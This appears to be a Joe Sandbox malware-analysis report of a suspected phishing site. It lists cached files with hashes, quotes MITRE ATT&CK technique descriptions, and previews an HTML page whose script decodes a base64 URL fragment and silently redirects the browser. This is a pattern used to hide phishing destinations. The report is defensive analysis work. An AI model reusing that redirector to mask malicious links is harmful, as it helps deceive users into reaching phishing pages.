Preview:	@charset "UTF-8";./! \| Copyright 2017 Microsoft Corporation \| This software is based on or incorporates material from the files listed below (collectively, "Third Party Code"). Microsoft is not the original author of the Third Party Code. The original copyright notice and the license under which Microsoft received Third Party Code are set forth below together with the full text of such license. Such notices and license are provided solely for your information. Microsoft, not the third party, licenses this Third Party Code to you under the terms in which you received the Microsoft software or the services, unless Microsoft clearly states that such Microsoft terms do NOT apply for a particular Third Party Code. Unless applicable law gives you more rights, Microsoft reserves all other rights not expressly granted under such agreement(s), whether by implication, estoppel or otherwise././! normalize.css v3.0.3 \| MIT License \| github.com/necolas/normalize.css /.body{margin:0}.context-uh

Chrome Cache Entry: 93

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (48316), with no line terminators
Category:	dropped
Size (bytes):	48316
Entropy (8bit):	5.6346993394709
Encrypted:	false
SSDEEP:
MD5:	2CA03AD87885AB983541092B87ADB299
SHA1:	1A17F60BF776A8C468A185C1E8E985C41A50DC27
SHA-256:	8E3B0117F4DF4BE452C0B6AF5B8F0A0ACF9D4ADE23D08D55D7E312AF22077762
SHA-512:	13C412BD66747822C6938926DE1C52B0D98659B2ED48249471EC0340F416645EA9114F06953F1AE5F177DB03A5D62F1FB5D321B2C4EB17F3A1C865B0A274DC5C
Malicious:	false
Reputation:	unknown
Preview:	!function(t,e){"object"==typeof exports?module.exports=exports=e():"function"==typeof define&&define.amd?define([],e):t.CryptoJS=e()}(this,function(){var n,o,s,a,h,t,e,l,r,i,c,f,d,u,p,S,x,b,A,H,z,_,v,g,y,B,w,k,m,C,D,E,R,M,F,P,W,O,I,U=U\|\|function(h){var i;if("undefined"!=typeof window&&window.crypto&&(i=window.crypto),"undefined"!=typeof self&&self.crypto&&(i=self.crypto),!(i=!(i=!(i="undefined"!=typeof globalThis&&globalThis.crypto?globalThis.crypto:i)&&"undefined"!=typeof window&&window.msCrypto?window.msCrypto:i)&&"undefined"!=typeof global&&global.crypto?global.crypto:i)&&"function"==typeof require)try{i=require("crypto")}catch(t){}var r=Object.create\|\|function(t){return e.prototype=t,t=new e,e.prototype=null,t};function e(){}var t={},n=t.lib={},o=n.Base={extend:function(t){var e=r(this);return t&&e.mixIn(t),e.hasOwnProperty("init")&&this.init!==e.init\|\|(e.init=function(){e.$super.init.apply(this,arguments)}),(e.init.prototype=e).$super=this,e},create:function(){var t=this.extend();

Chrome Cache Entry: 95

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	PNG image data, 160 x 85, 8-bit colormap, non-interlaced
Category:	dropped
Size (bytes):	1476
Entropy (8bit):	7.769220923595574
Encrypted:	false
SSDEEP:
MD5:	D8B7A4AEB993847084A441FC4966C1F9
SHA1:	63F0221682B3A562462108011589B4EF16EDBF4D
SHA-256:	BB6153F96342D501733952BBBB55BFD31E75478BBF225FECC80951349AC01701
SHA-512:	8DC7CB4054463BB21A7212F53E02A796C114D22A7EB77FBB5267EFC29EBB01B06DF3C848962B39010D38A8C31CB7D915767D9DBF59A8BD1D13E95076757CC4F5
Malicious:	false
Reputation:	unknown
Preview:	.PNG........IHDR.......U......N......sRGB........rPLTE)................#)....100.......#...1=A........utt.Xr..........a[W...GGGA..'....h..".....).....+r..DJ....qyP.<'....IDATh...:.F!A.w#.....9...S..=."=........v..$U!.8..).]{.9.qUc.3..9..<.kD..zM.\.{..>I.0..2.........).=....#.y..Q..v.g..A(IO.N.~p~fA.!...w.H..,kV.=.QPGI.d_......r.x........'....{.B.%.......\T....H..z...S.......7..Y.-%q.&I.............=..,....U%..4....=....w...Q.f.s.......0....X+.r.x..0..O..z.x...X7."> 4........v.?.^..p.M...`..b.F>v8.al.....RU....V).a.. mm.p.....l......=c.\|6.'./.J.........\O.."Z....._5......y........`..o.Vr..7.bT.yN..)%V....C.C.....=.....8.....5....B.....`K..WR....!MD...n.......'P..2.9...Vn.Ku..,.=.N...1G(.?o.....X..K.w..@8..J..!.a&..:....c.C... ......R...P.;y^......7).......&........Dj..7..\|.......f..............X..,~.G/...8.1.C..F.TdL.&DSh....={.\|.....=..aN..).2.X..k.....a@.B...l..&i.i.#=.....X.$.+...`."P....P.d...e..Z..%.$....0.....r..D.X........4....LK,N.....47.(.

Chrome Cache Entry: 97

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	HTML document, ASCII text
Category:	downloaded
Size (bytes):	1045
Entropy (8bit):	4.935566191494263
Encrypted:	false
SSDEEP:
MD5:	B3815812759AEF37E6AC5C136929E620
SHA1:	F0752DDBF8899E1A363D585AEBC2496F5D5CCDD0
SHA-256:	FB3E9739D9EBB8A801C1191595E10DE993B4BFDEB49463295B9F63B6C663B09B
SHA-512:	7E98BA97827552D357F34851E9FF6BD7F10FAE2DE266F71328638562B6D622343E5E61C0D6D8449E056ABD389C5816599B6B83DFF6EDDC0F9B3C3A786D1CA44A
Malicious:	false
Reputation:	unknown
URL:	https://lexinvariant.com/
Preview:	<scriptlanguage="javascript">.<html lang="en">.<head>.<meta charset="UTF-8">.<title>Redirect</title>.<script>.function base64DecodeUrl(str){. return decodeURIComponent(atob(str).split('').map(function(c) {. return '%' + ('00' + c.charCodeAt(0).toString(16)).slice(-2);. }).join(''));.}..window.onload = function() {. var hash = window.location.hash.substr(1); // Get the fragment after the '#'. var url;.. if (hash && hash.substr(0, 4) === 'http') {. url = hash; // If the fragment starts with 'http', use it as the URL. } else {. if (hash.includes('/')) {. url = base64DecodeUrl(hash.split('/')[0])+hash.split('/')[1]; // If not, try to base64 decode it. } else {. url = base64DecodeUrl(hash); // If not, try to base64 decode it. }. }.. if (url && /^(https?:\/\/)/.test(url)) { // Regex to check if the url starts with 'http://' or 'https://'. window.location.href = url; // If it's a valid URL, redirect. }.};.</scr

Chrome Cache Entry: 99

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (513), with no line terminators
Category:	downloaded
Size (bytes):	513
Entropy (8bit):	5.350826451115093
Encrypted:	false
SSDEEP:
MD5:	602C381194795DFC124FACDF48492EF1
SHA1:	90D594B7B5AF217824F2974514548C95FECFBFA5
SHA-256:	BF450798FB52E2458A1E10749577E5334F3E1D7907A47FDFEA5430CB71FA19E6
SHA-512:	8837F6BD2A11387D31A866D07B66A0FF2E58D2EDC2682A582919A1896CE9B4CB683A795D91968B41FA46C31CE62D34414E1F3318D4F5DDA2999447F4BCA6133D
Malicious:	false
Reputation:	unknown
URL:	https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=f65ecb70-094d-0b11-7c9d-7da1bcadfaa7
Preview:	var jsllConfig={useDefaultContentName:!0,syncMuid:!0,authMethod:AUTHMETHOD,isLoggedIn:ISLOGGEDIN===undefined\|\|ISLOGGEDIN!=="True"?!1:!0,muidDomain:MUIDDOMAIN\|\|"microsoft.com",useShortNameForContentBlob:!1,autoCapture:{pageView:!0,onLoad:!0,onUnload:!0,click:!0,scroll:!0,resize:!0,lineage:!0,jsError:!0,addin:!0,perf:!0},coreData:{appId:JSLLAPPID,market:LOCALE,pageName:PAGENAME,pageType:PAYLOADTYPE,referrerUri:document.referrer,requestUri:window.location.href},callback:{pageName:PAGENAME}};awa.init(jsllConfig)

Static File Info

⊘No static file info

Description:	Adversaries may abuse Internet browser extensions to establish persistent access to victim systems. Browser extensions or plugins are small programs that can add functionality and customize aspects of Internet browsers. They can be installed directly or through a browser's app store and generally have access and permissions to everything that the browser can access.
Tactics:	Persistence
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Process: Process Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject malicious code into process via Extra Window Memory (EWM) in order to evade process-based defenses as well as possibly elevate privileges. EWM injection is a method of executing arbitrary code in the address space of a separate live process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Process: OS API Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report https://shadowline-hub-uk-limited.jimdosite.com/

Overview

General Information

Detection

Signatures

Classification

Process Tree

Yara Signatures

HTML

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

Phishing

Compliance

Software Vulnerabilities

Networking

System Summary

Boot Survival

Mitre Att&ck Matrix

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

LLM Input / Output

Created / dropped Files

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk

Chrome Cache Entry: 102

Chrome Cache Entry: 104

Chrome Cache Entry: 105

Chrome Cache Entry: 107

Chrome Cache Entry: 108

Chrome Cache Entry: 109

Chrome Cache Entry: 110

Chrome Cache Entry: 111

Chrome Cache Entry: 112

Chrome Cache Entry: 113

Chrome Cache Entry: 115

Chrome Cache Entry: 117

Chrome Cache Entry: 120

Chrome Cache Entry: 122

Chrome Cache Entry: 123

Chrome Cache Entry: 125

Chrome Cache Entry: 126

Chrome Cache Entry: 127

Chrome Cache Entry: 128

Chrome Cache Entry: 129

Chrome Cache Entry: 130

Chrome Cache Entry: 132

Chrome Cache Entry: 134

Chrome Cache Entry: 135

Chrome Cache Entry: 136

Chrome Cache Entry: 93

Chrome Cache Entry: 95

Chrome Cache Entry: 97

Chrome Cache Entry: 99

Static File Info

Windows Analysis Report
https://shadowline-hub-uk-limited.jimdosite.com/